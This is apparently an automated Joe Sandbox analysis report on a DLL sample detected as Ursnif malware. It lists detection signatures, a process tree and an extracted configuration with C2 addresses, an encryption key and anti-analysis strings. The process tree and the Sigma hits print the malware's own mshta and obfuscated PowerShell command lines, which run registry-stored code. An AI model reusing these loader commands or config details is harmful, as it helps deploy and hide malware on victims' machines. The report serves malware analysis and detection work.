Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NdmYtW.xyiLj

Overview

General Information

Sample Name:NdmYtW.xyiLj (renamed file extension from xyiLj to dll)
Analysis ID:613876
MD5:f0f0659d9838d978a8b7e7391b81c801
SHA1:6adf95dab8d012a85ee4ed93f970d610ea2138bc
SHA256:f32f9fed2539cf3a6f585bc961035ccf3a03095c1f27e688f2da2811eca045f1
Tags:dll
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Writes to foreign memory regions
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Sigma detected: MSHTA Spawning Windows Shell
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6884 cmdline: loaddll32.exe "C:\Users\user\Desktop\NdmYtW.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6900 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\NdmYtW.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6924 cmdline: rundll32.exe "C:\Users\user\Desktop\NdmYtW.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 6356 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
    • WerFault.exe (PID: 7000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 604 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 7088 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 612 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4596 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 5052 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gbob='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gbob).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name llstxy -value gp; new-alias -name dtaagibhy -value iex; dtaagibhy ([System.Text.Encoding]::ASCII.GetString((llstxy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6512 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s5wot0wy\s5wot0wy.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6580 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES249.tmp" "c:\Users\user\AppData\Local\Temp\s5wot0wy\CSC4A66175C42A34DCCBF374AEBACAD802E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5992 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sg2urkr\0sg2urkr.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6104 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES23CB.tmp" "c:\Users\user\AppData\Local\Temp\0sg2urkr\CSC9E8D9CF5EFB2455BAC85F18857F6B836.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup
{"RSA Public Key": "rM7U8h0H6XyHguKwe9if1a7N2/FMbudF6vIxc9cr6EC/ZxyH88ceq1sDzyjTgbcBMGvmPN0YcdpRxnebuQQLE3vAtHW2D9dfaEUpfJPWVhDRMv39NnfkoeGJw/DKTIS7SCwLstvvOgf2mhmdWsmtHCXwtcYZiWu8/BOeGK1BWWHiN/Ig8xejls7e4AIsWKVv4+0iV7nRKNKROI2Qs2vRdc6VR6tqxTeQ3FcxQqhTkNgnBHeF+EnzLo2cTMhoG9V16GNJW/rY0Nz2nqGVlgMhDYPyTdL4ybN77mlsw23BUmoUdB2vxx7aFOwbEJIw3SXQUMfs3KCDU3fRYvlDBVDr40UzsOF+1zKtZ4V9bCghne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8,  *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
SourceRuleDescriptionAuthorStrings
00000013.00000003.600756662.0000018A7D8AC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000002.00000003.518051761.0000000005768000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000002.00000003.473139925.0000000005768000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000002.00000003.473019691.0000000005768000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000002.00000003.472939610.0000000005768000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 12 entries
            SourceRuleDescriptionAuthorStrings
            2.3.rundll32.exe.56e94a0.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.3.rundll32.exe.566a4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                2.3.rundll32.exe.5716940.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  2.3.rundll32.exe.56e94a0.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    2.3.rundll32.exe.566a4a0.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 1 entries

                      System Summary

                      barindex
                      Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 5052, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
                      Source: Threat createdAuthor: Nikita Nazarov, oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 5248, StartAddress: 73801580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 684
                      Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 5248, StartAddress: 73801580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 684
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name llstxy -value gp; new-alias -name dtaagibhy -value iex; dtaagibhy ([System.Text.Encoding]::ASCII.GetString((llstxy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name llstxy -value gp; new-alias -name dtaagibhy -value iex; dtaagibhy ([System.Text.Encoding]::ASCII.GetString((llstxy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gbob='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gbob).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5052, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name llstxy -value gp; new-alias -name dtaagibhy -value iex; dtaagibhy ([System.Text.Encoding]::ASCII.GetString((llstxy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 5248, ProcessName: powershell.exe